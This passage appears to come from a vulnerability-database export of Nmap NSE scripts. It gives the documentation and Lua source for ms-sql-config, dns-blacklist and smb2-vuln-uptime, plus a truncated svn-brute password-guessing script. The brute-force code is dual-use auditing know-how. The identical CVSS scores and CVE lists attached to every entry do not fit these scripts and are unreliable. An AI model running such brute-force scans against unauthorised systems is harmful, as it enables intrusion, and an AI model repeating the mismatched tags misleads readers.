[smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=sa <host>\n \n\n## Script Output \n \n \n | ms-sql-config:\n | [192.168.100.25\\MSSQLSERVER]\n | Databases\n | name db_size owner\n | ==== ======= =====\n | nmap 2.74 MB MAC-MINI\\david\n | Configuration\n | name value inuse description\n | ==== ===== ===== ===========\n | SQL Mail XPs 0 0 Enable or disable SQL Mail XPs\n | Database Mail XPs 0 0 Enable or disable Database Mail XPs\n | SMO and DMO XPs 1 1 Enable or disable SMO and DMO XPs\n | Ole Automation Procedures 0 0 Enable or disable Ole Automation Procedures\n | xp_cmdshell 0 0 Enable or disable command shell\n | Ad Hoc Distributed Queries 0 0 Enable or disable Ad Hoc Distributed Queries\n | Replication XPs 0 0 Enable or disable Replication XPs\n | Linked Servers\n | srvname srvproduct providername\n | ======= ========== ============\n |_ MAC-MINI SQL Server SQLOLEDB\n \n\n## Requires \n\n * [mssql](<../lib/mssql.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-04-04T10:11:54", "type": "nmap", "title": "ms-sql-config NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2022-01-03T21:08:52", "id": "NMAP:MS-SQL-CONFIG.NSE", "href": "https://nmap.org/nsedoc/scripts/ms-sql-config.html", "sourceData": "local mssql = require \"mssql\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\n-- -*- mode: lua -*-\n-- vim: set filetype=lua :\n\ndescription = [[\nQueries Microsoft SQL Server (ms-sql) instances for a list of databases, linked servers,\nand configuration settings.\n\nSQL Server credentials required: Yes (use <code>ms-sql-brute</code>, <code>ms-sql-empty-password</code>\nand/or <code>mssql.username</code> & <code>mssql.password</code>)\nRun criteria:\n* Host script: Will run if the <code>mssql.instance-all</code>, <code>mssql.instance-name</code>\nor <code>mssql.instance-port</code> script arguments are used (see mssql.lua).\n* Port script: Will run against any services identified as SQL Servers, but only\nif the <code>mssql.instance-all</code>, <code>mssql.instance-name</code>\nand <code>mssql.instance-port</code> script arguments are NOT used.\n\nNOTE: Communication with instances via named pipes depends on the <code>smb</code>\nlibrary. To communicate with (and possibly to discover) instances via named pipes,\nthe host must have at least one SMB port (e.g. TCP 445) that was scanned and\nfound to be open. Additionally, named pipe connections may require Windows\nauthentication to connect to the Windows host (via SMB) in addition to the\nauthentication required to connect to the SQL Server instances itself. See the\ndocumentation and arguments for the <code>smb</code> library for more information.\n\nNOTE: By default, the ms-sql-* scripts may attempt to connect to and communicate\nwith ports that were not included in the port list for the Nmap scan. 
This can\nbe disabled using the <code>mssql.scanned-ports-only</code> script argument.\n]]\n\n---\n-- @usage\n-- nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=sa <host>\n--\n-- @args ms-sql-config.showall If set, shows all configuration options.\n--\n-- @output\n-- | ms-sql-config:\n-- | [192.168.100.25\\MSSQLSERVER]\n-- | Databases\n-- | name db_size owner\n-- | ==== ======= =====\n-- | nmap 2.74 MB MAC-MINI\\david\n-- | Configuration\n-- | name value inuse description\n-- | ==== ===== ===== ===========\n-- | SQL Mail XPs 0 0 Enable or disable SQL Mail XPs\n-- | Database Mail XPs 0 0 Enable or disable Database Mail XPs\n-- | SMO and DMO XPs 1 1 Enable or disable SMO and DMO XPs\n-- | Ole Automation Procedures 0 0 Enable or disable Ole Automation Procedures\n-- | xp_cmdshell 0 0 Enable or disable command shell\n-- | Ad Hoc Distributed Queries 0 0 Enable or disable Ad Hoc Distributed Queries\n-- | Replication XPs 0 0 Enable or disable Replication XPs\n-- | Linked Servers\n-- | srvname srvproduct providername\n-- | ======= ========== ============\n-- |_ MAC-MINI SQL Server SQLOLEDB\n--\n\n-- Created 04/02/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n-- Revised 02/01/2011 - v0.2 - Added ability to run against all instances on a host;\n-- added compatibility with changes in mssql.lua (Chris Woodbury)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\ndependencies = {\"broadcast-ms-sql-discover\", \"ms-sql-brute\", \"ms-sql-empty-password\"}\n\n--- Processes a set of instances\nlocal function process_instance( instance )\n\n local status, errorMessage\n local result, result_part = {}, {}\n local conf_filter = stdnse.get_script_args( {'mssql-config.showall', 'ms-sql-config.showall'} ) and \"\"\n or \" WHERE configuration_id > 16384\"\n local db_filter = stdnse.get_script_args( {'mssql-config.showall', 
'ms-sql-config.showall'} ) and \"\"\n or \" WHERE name NOT IN ('master','model','tempdb','msdb')\"\n local helper = mssql.Helper:new()\n\n local queries = {\n [2]={ [\"Configuration\"] = [[ SELECT name,\n cast(value as varchar) value,\n cast(value_in_use as varchar) inuse,\n description\n FROM sys.configurations ]] .. conf_filter },\n [3]={ [\"Linked Servers\"] = [[ SELECT srvname, srvproduct, providername\n FROM master..sysservers\n WHERE srvid > 0 ]] },\n [1]={ [\"Databases\"] = [[ CREATE TABLE #nmap_dbs(name varchar(255), db_size varchar(255), owner varchar(255),\n dbid int, created datetime, status varchar(512), compatibility_level int )\n INSERT INTO #nmap_dbs EXEC sp_helpdb\n SELECT name, db_size, owner\n FROM #nmap_dbs ]] .. db_filter .. [[\n DROP TABLE #nmap_dbs ]] }\n }\n\n status, errorMessage = helper:ConnectEx( instance )\n if ( not(status) ) then result = \"ERROR: \" .. errorMessage end\n\n if status then\n status, errorMessage = helper:LoginEx( instance )\n if ( not(status) ) then result = \"ERROR: \" .. errorMessage end\n end\n\n for _, v in ipairs( queries ) do\n if ( not status ) then break end\n for header, query in pairs(v) do\n status, result_part = helper:Query( query )\n\n if ( not(status) ) then\n result = \"ERROR: \" .. result_part\n break\n end\n result_part = mssql.Util.FormatOutputTable( result_part, true )\n result_part.name = header\n table.insert( result, result_part )\n end\n end\n\n helper:Disconnect()\n\n -- TODO: structured output instead of format_output\n return stdnse.format_output(true, result)\nend\n\naction, portrule, hostrule = mssql.Helper.InitScript(process_instance)\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:00", "description": "Checks target IP addresses against multiple DNS anti-spam and open proxy blacklists and returns a list of services for which an IP has been flagged. 
Checks may be limited by service category (e.g. SPAM, PROXY) or to a specific service name.\n\n## Script Arguments \n\n#### dns-blacklist.services \n\nstring containing a comma-separated list of services to query. (default: all)\n\n#### dns-blacklist.ip \n\nstring containing the IP to check; only needed if running the script as a prerule.\n\n#### dns-blacklist.list \n\nlists all services that are available for a certain category.\n\n#### dns-blacklist.category \n\nstring containing the service category to query, e.g. spam or proxy (default: all)\n\n#### dns-blacklist.mode \n\nstring containing either \"short\" or \"long\". Long mode can sometimes provide additional information as to why an IP has been blacklisted. (default: long)\n\n## Example Usage \n \n \n nmap --script dns-blacklist --script-args='dns-blacklist.ip=<ip>'\n or\n nmap -sn <ip> --script dns-blacklist\n \n\n## Script Output \n \n \n Pre-scan script results:\n | dns-blacklist:\n | 1.2.3.4\n | PROXY\n | dnsbl.tornevall.org - PROXY\n | IP marked as \"abusive host\".\n | Proxy is working\n | Proxy has been scanned\n | SPAM\n | dnsbl.inps.de - SPAM\n | Spam Received See: http://www.sorbs.net/lookup.shtml?1.2.3.4\n | l2.apews.org - SPAM\n | list.quorum.to - SPAM\n | bl.spamcop.net - SPAM\n |_ spam.dnsbl.sorbs.net - SPAM\n \n Supported blacklist list mode (--script-args dns-blacklist.list):\n | dns-blacklist:\n | PROXY\n | socks.dnsbl.sorbs.net\n | http.dnsbl.sorbs.net\n | misc.dnsbl.sorbs.net\n | dnsbl.tornevall.org\n | SPAM\n | dnsbl.inps.de\n | bl.nszones.com\n | l2.apews.org\n | list.quorum.to\n | all.spamrats.com\n | bl.spamcop.net\n | spam.dnsbl.sorbs.net\n |_ sbl.spamhaus.org\n \n\n## Requires \n\n * [dnsbl](<../lib/dnsbl.html>)\n * [ipOps](<../lib/ipOps.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-12-26T14:22:25", "type": "nmap", "title": "dns-blacklist NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:DNS-BLACKLIST.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-blacklist.html", "sourceData": "local dnsbl = require \"dnsbl\"\nlocal ipOps = require \"ipOps\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nChecks target IP addresses against multiple DNS anti-spam and open\nproxy blacklists and returns a list of services for which an IP has been flagged. Checks may be limited by service category (eg: SPAM,\nPROXY) or to a specific service name. 
]]\n\n---\n-- @usage\n-- nmap --script dns-blacklist --script-args='dns-blacklist.ip=<ip>'\n-- or\n-- nmap -sn <ip> --script dns-blacklist\n--\n-- @output\n-- Pre-scan script results:\n-- | dns-blacklist:\n-- | 1.2.3.4\n-- | PROXY\n-- | dnsbl.tornevall.org - PROXY\n-- | IP marked as \"abusive host\".\n-- | Proxy is working\n-- | Proxy has been scanned\n-- | SPAM\n-- | dnsbl.inps.de - SPAM\n-- | Spam Received See: http://www.sorbs.net/lookup.shtml?1.2.3.4\n-- | l2.apews.org - SPAM\n-- | list.quorum.to - SPAM\n-- | bl.spamcop.net - SPAM\n-- |_ spam.dnsbl.sorbs.net - SPAM\n--\n-- Supported blacklist list mode (--script-args dns-blacklist.list):\n-- | dns-blacklist:\n-- | PROXY\n-- | socks.dnsbl.sorbs.net\n-- | http.dnsbl.sorbs.net\n-- | misc.dnsbl.sorbs.net\n-- | dnsbl.tornevall.org\n-- | SPAM\n-- | dnsbl.inps.de\n-- | bl.nszones.com\n-- | l2.apews.org\n-- | list.quorum.to\n-- | all.spamrats.com\n-- | bl.spamcop.net\n-- | spam.dnsbl.sorbs.net\n-- |_ sbl.spamhaus.org\n--\n-- @args dns-blacklist.ip string containing the IP to check only needed if\n-- running the script as a prerule.\n--\n-- @args dns-blacklist.mode string containing either \"short\" or \"long\"\n-- long mode can sometimes provide additional information to why an IP\n-- has been blacklisted. (default: long)\n--\n-- @args dns-blacklist.list lists all services that are available for a\n-- certain category.\n--\n-- @args dns-blacklist.services string containing a comma-separated list of\n-- services to query. (default: all)\n--\n-- @args dns-blacklist.category string containing the service category to query\n-- eg. spam or proxy (default: all)\n--\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"external\", \"safe\"}\n\n\n-- The script can be run either as a host- or pre-rule\nhostrule = function() return true end\nprerule = function() return true end\n\nlocal arg_IP = stdnse.get_script_args(SCRIPT_NAME .. 
\".ip\")\nlocal arg_mode = stdnse.get_script_args(SCRIPT_NAME .. \".mode\") or \"long\"\nlocal arg_list = stdnse.get_script_args(SCRIPT_NAME .. \".list\")\nlocal arg_services = stdnse.get_script_args(SCRIPT_NAME .. \".services\")\nlocal arg_category = stdnse.get_script_args(SCRIPT_NAME .. \".category\") or \"all\"\n\nlocal function listServices()\n local result = {}\n if ( \"all\" == arg_category ) then\n for cat in pairs(dnsbl.SERVICES) do\n local helper = dnsbl.Helper:new(cat, arg_mode)\n local cat_res= helper:listServices()\n cat_res.name = cat\n table.insert(result, cat_res)\n end\n else\n result = dnsbl.Helper:new(arg_category, arg_mode):listServices()\n end\n return stdnse.format_output(true, result)\nend\n\nlocal function formatResult(result)\n local output = {}\n for _, svc in ipairs(result) do\n if ( svc.result.details ) then\n svc.result.details.name = (\"%s - %s\"):format(svc.name, svc.result.state)\n table.insert(output, svc.result.details)\n else\n table.insert(output, (\"%s - %s\"):format(svc.name, svc.result.state))\n end\n end\n return output\nend\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\ndnsblAction = function(host)\n\n local helper\n if ( arg_services and ( not(arg_category) or \"all\" == arg_category:lower() ) ) then\n return fail(\"A service filter can't be used without a specific category\")\n elseif( \"all\" ~= arg_category ) then\n helper = dnsbl.Helper:new(arg_category, arg_mode)\n helper:setFilter(arg_services)\n local status, err = helper:validateFilter()\n if ( not(status) ) then\n return fail((\"%s\"):format(err))\n end\n end\n\n local output = {}\n if ( helper ) then\n local result = helper:checkBL(host.ip)\n if ( #result == 0 ) then return end\n output = formatResult(result)\n else\n for cat in pairs(dnsbl.SERVICES) do\n helper = dnsbl.Helper:new(cat, arg_mode)\n local result = helper:checkBL(host.ip)\n local out_part = formatResult(result)\n if ( #out_part > 0 ) then\n out_part.name = cat\n 
table.insert(output, out_part)\n end\n end\n if ( #output == 0 ) then return end\n end\n\n if ( \"prerule\" == SCRIPT_TYPE ) then\n output.name = host.ip\n end\n\n return stdnse.format_output(true, output)\nend\n\n\n-- execute the action function corresponding to the current rule\naction = function(...)\n\n if ( arg_mode ~= \"short\" and arg_mode ~= \"long\" ) then\n return fail(\"Invalid argument supplied, mode should be either 'short' or 'long'\")\n end\n\n if ( arg_IP and not(ipOps.todword(arg_IP)) ) then\n return fail(\"Invalid IP address was supplied\")\n end\n\n -- if the list argument was given, just list the services and abort\n if ( arg_list ) then\n return listServices()\n end\n\n if ( arg_IP and \"prerule\" == SCRIPT_TYPE ) then\n return dnsblAction( { ip = arg_IP } )\n elseif ( \"hostrule\" == SCRIPT_TYPE ) then\n return dnsblAction(...)\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:34:52", "description": "Attempts to detect missing patches in Windows systems by checking the uptime returned during the SMB2 protocol negotiation. \n\nSMB2 protocol negotiation response returns the system boot time pre-authentication. This information can be used to determine if a system is missing critical patches without triggering IDS/IPS/AVs. \n\nRemember that a rebooted system may still be vulnerable. This check only reveals unpatched systems based on the uptime, no additional probes are sent. \n\nReferences: \n\n * <https://twitter.com/breakersall/status/880496571581857793>\n\n## Script Arguments \n\n#### smb2-vuln-uptime.skip-os \n\nIgnore OS detection results and show results\n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. 
\n\n#### vulns.short, vulns.showall \n\nSee the documentation for the [vulns](<../lib/vulns.html#script-args>) library. \n\n## Example Usage \n\n * nmap -O --script smb2-vuln-uptime <target>\n\n * nmap -p445 --script smb2-vuln-uptime --script-args smb2-vuln-uptime.skip-os=true <target>\n \n\n## Script Output \n \n \n | smb2-vuln-uptime:\n | VULNERABLE:\n | MS17-010: Security update for Windows SMB Server\n | State: LIKELY VULNERABLE\n | IDs: ms:ms17-010 CVE:2017-0147\n | This system is missing a security update that resolves vulnerabilities in\n | Microsoft Windows SMB Server.\n |\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-0147\n |_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n \n\n## Requires \n\n * [os](<>)\n * [datetime](<../lib/datetime.html>)\n * [smb](<../lib/smb.html>)\n * [vulns](<../lib/vulns.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [smb2](<../lib/smb2.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-28T09:01:02", "type": "nmap", "title": "smb2-vuln-uptime NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2021-01-18T21:21:43", "id": "NMAP:SMB2-VULN-UPTIME.NSE", "href": "https://nmap.org/nsedoc/scripts/smb2-vuln-uptime.html", "sourceData": "local os = require \"os\"\nlocal datetime = require \"datetime\"\nlocal smb = require \"smb\"\nlocal vulns = require \"vulns\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal smb2 = require \"smb2\"\nlocal table = require \"table\"\n\ndescription = [[\nAttempts to detect missing patches in Windows systems by checking the\nuptime returned during the SMB2 protocol negotiation.\n\nSMB2 protocol negotiation response returns the system boot time\n pre-authentication. This information can be used to determine\n if a system is missing critical patches without triggering IDS/IPS/AVs.\n\nRemember that a rebooted system may still be vulnerable. This check\nonly reveals unpatched systems based on the uptime, no additional probes are sent.\n\nReferences:\n* https://twitter.com/breakersall/status/880496571581857793\n]]\n\n---\n-- @usage nmap -O --script smb2-vuln-uptime <target>\n-- @usage nmap -p445 --script smb2-vuln-uptime --script-args smb2-vuln-uptime.skip-os=true <target>\n--\n-- @output\n-- | smb2-vuln-uptime:\n-- | VULNERABLE:\n-- | MS17-010: Security update for Windows SMB Server\n-- | State: LIKELY VULNERABLE\n-- | IDs: ms:ms17-010 CVE:2017-0147\n-- | This system is missing a security update that resolves vulnerabilities in\n-- | Microsoft Windows SMB Server.\n-- |\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-0147\n-- |_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n--\n-- @xmloutput\n-- <table key=\"2017-0147\">\n-- <elem key=\"title\">MS17-010: Security update for Windows SMB Server</elem>\n-- <elem key=\"state\">LIKELY VULNERABLE</elem>\n-- <table key=\"ids\">\n-- <elem>CVE:2017-0147</elem>\n-- <elem>ms:ms17-010</elem>\n-- </table>\n-- <table 
key=\"description\">\n-- <elem>This system is missing a security update that resolves vulnerabilities in
 Microsoft Windows SMB Server.
</elem>\n-- </table>\n-- <table key=\"refs\">\n-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-0147</elem>\n-- <elem>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</elem>\n-- </table>\n-- </table>\n--\n-- @args smb2-vuln-uptime.skip-os Ignore OS detection results and show results\n---\n\nauthor = \"Paulino Calderon <calderon()calderonpale.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"vuln\", \"safe\"}\n\nhostrule = function(host)\n local ms = false\n local os_detection = stdnse.get_script_args(SCRIPT_NAME .. \".skip-os\") or false\n if host.os then\n for k, v in pairs(host.os) do -- Loop through OS matches\n if string.match(v['name'], \"Microsoft\") then\n ms = true\n end\n end\n end\n return (smb.get_port(host) ~= nil and ms) or (os_detection)\nend\n\nlocal ms_vulns = {\n {\n title = 'MS17-010: Security update for Windows SMB Server',\n ids = {ms = \"ms17-010\", CVE = \"2017-0147\"},\n desc = [[\nThis system is missing a security update that resolves vulnerabilities in\n Microsoft Windows SMB Server.\n]],\n disclosure_time = 1489471200,\n disclosure_date = {year=2017, month=3, day=14},\n references = {\n 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx',\n },\n },\n {\n title = 'Microsoft Kerberos Checksum Vulnerability',\n ids = {ms = \"ms14-068\", CVE = \"2014-6324\"},\n desc = [[\nThis security update resolves a privately reported vulnerability in Microsoft\n Windows Kerberos KDC that could allow an attacker to elevate unprivileged\n domain user account privileges to those of the domain administrator account.\n]],\n disclosure_time = 1416290400,\n disclosure_date = {year=2014, month=11, day=18},\n references = {\n 'https://technet.microsoft.com/en-us/library/security/ms14-068.aspx'\n },\n },\n}\n\nlocal function check_vulns(host, port)\n local smbstate, status\n local vulns_detected = {}\n\n status, smbstate = smb.start(host)\n status = 
smb2.negotiate_v2(smbstate)\n\n if not status then\n stdnse.debug2(\"Negotiation failed\")\n return nil, \"Protocol negotiation failed (SMB2)\"\n end\n\n datetime.record_skew(host, smbstate.time, os.time())\n stdnse.debug2(\"SMB2: Date: %s (%s) Start date:%s (%s)\",\n smbstate['date'], smbstate['time'],\n smbstate['start_date'], smbstate['start_time'])\n if smbstate['start_time'] == 0 then\n stdnse.debug2(\"Boot time not provided\")\n return nil, \"Boot time not provided\"\n end\n\n for _, vuln in pairs(ms_vulns) do\n if smbstate['start_time'] < vuln['disclosure_time'] then\n stdnse.debug2(\"Vulnerability detected\")\n vuln.extra_info = string.format(\"The system hasn't been rebooted since %s\", smbstate['start_date'])\n table.insert(vulns_detected, vuln)\n end\n end\n\n return true, vulns_detected\nend\n\naction = function(host,port)\n local status, vulnerabilities\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n\n status, vulnerabilities = check_vulns(host, port)\n if status then\n for i, v in pairs(vulnerabilities) do\n local vuln = { title = v['title'], description = v['desc'],\n references = v['references'], disclosure_date = v['disclosure_date'],\n IDS = v['ids']}\n vuln.state = vulns.STATE.LIKELY_VULN\n vuln.extra_info = v['extra_info']\n report:add_vulns(SCRIPT_NAME, vuln)\n end\n end\n return report:make_output()\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:33:58", "description": "Performs brute force password auditing against Subversion source code control servers.\n\n## Script Arguments \n\n#### svn-brute.repo \n\nthe Subversion repository against which to perform password guessing\n\n#### svn-brute.force \n\nforce password guessing when service is accessible both anonymously and through authentication\n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. 
\n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script svn-brute --script-args svn-brute.repo=/svn/ -p 3690 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 3690/tcp open svn syn-ack\n | svn-brute:\n | Accounts\n |_ patrik:secret => Login correct\n \n Summary\n -------\n x The svn class contains the code needed to perform CRAM-MD5\n authentication\n x The Driver class contains the driver implementation used by the brute\n library\n \n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [stringaux](<../lib/stringaux.html>)\n * [openssl](<../lib/openssl.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-08-18T20:50:51", "type": "nmap", "title": "svn-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:SVN-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/svn-brute.html", "sourceData": "local brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal stringaux = require \"stringaux\"\nlocal openssl = stdnse.silent_require \"openssl\"\n\ndescription = [[\nPerforms brute force password auditing against Subversion source code control servers.\n]]\n\n---\n-- @usage\n-- nmap --script svn-brute --script-args svn-brute.repo=/svn/ -p 3690 <host>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 3690/tcp open svn syn-ack\n-- | svn-brute:\n-- | Accounts\n-- |_ patrik:secret => Login correct\n--\n-- Summary\n-- -------\n-- x The svn class contains the code needed to perform CRAM-MD5\n-- authentication\n-- x The Driver class contains the driver implementation used by the brute\n-- library\n--\n-- @args svn-brute.repo the Subversion repository against which to perform\n-- password guessing\n-- @args svn-brute.force force password guessing when service is accessible\n-- both anonymously and through authentication\n\n--\n-- Version 0.1\n-- Created 07/12/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n--\n\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\n\nportrule = shortport.port_or_service(3690, \"svnserve\", \"tcp\", \"open\")\n\nsvn =\n{\n svn_client = \"nmap-brute v0.1\",\n\n new = function(self, host, port, repo)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.repo = repo\n o.invalid_users = {}\n return o\n end,\n\n --- Connects to the SVN - repository\n --\n 
-- @return status true on success, false on failure\n -- @return err string containing an error message on failure\n connect = function(self)\n local repo_url = ( \"svn://%s/%s\" ):format(self.host.ip, self.repo)\n local status, msg\n\n self.socket = brute.new_socket()\n\n local result\n status, result = self.socket:connect(self.host, self.port)\n if( not(status) ) then\n return false, result\n end\n\n status, msg = self.socket:receive_bytes(1)\n if ( not(status) or not( msg:match(\"^%( success\") ) ) then\n return false, \"Banner reports failure\"\n end\n\n msg = (\"( 2 ( edit-pipeline svndiff1 absent-entries depth mergeinfo log-revprops ) %d:%s %d:%s ( ) ) \"):format( #repo_url, repo_url, #self.svn_client, self.svn_client )\n status = self.socket:send( msg )\n if ( not(status) ) then\n return false, \"Send failed\"\n end\n\n status, msg = self.socket:receive_bytes(1)\n if ( not(status) ) then\n return false, \"Receive failed\"\n end\n\n if ( msg:match(\"%( success\") ) then\n local tmp = msg:match(\"%( success %( %( ([%S+%s*]-) %)\")\n if ( not(tmp) ) then return false, \"Failed to detect authentication\" end\n tmp = stringaux.strsplit(\" \", tmp)\n self.auth_mech = {}\n for _, v in pairs(tmp) do self.auth_mech[v] = true end\n elseif ( msg:match(\"%( failure\") ) then\n return false\n end\n\n return true\n end,\n\n --- Attempts to login to the SVN server\n --\n -- @param username string containing the login username\n -- @param password string containing the login password\n -- @return status, true on success, false on failure\n -- @return err string containing error message on failure\n login = function( self, username, password )\n local status, msg\n local challenge, digest\n\n if ( self.auth_mech[\"CRAM-MD5\"] ) then\n msg = \"( CRAM-MD5 ( ) ) \"\n status = self.socket:send( msg )\n\n status, msg = 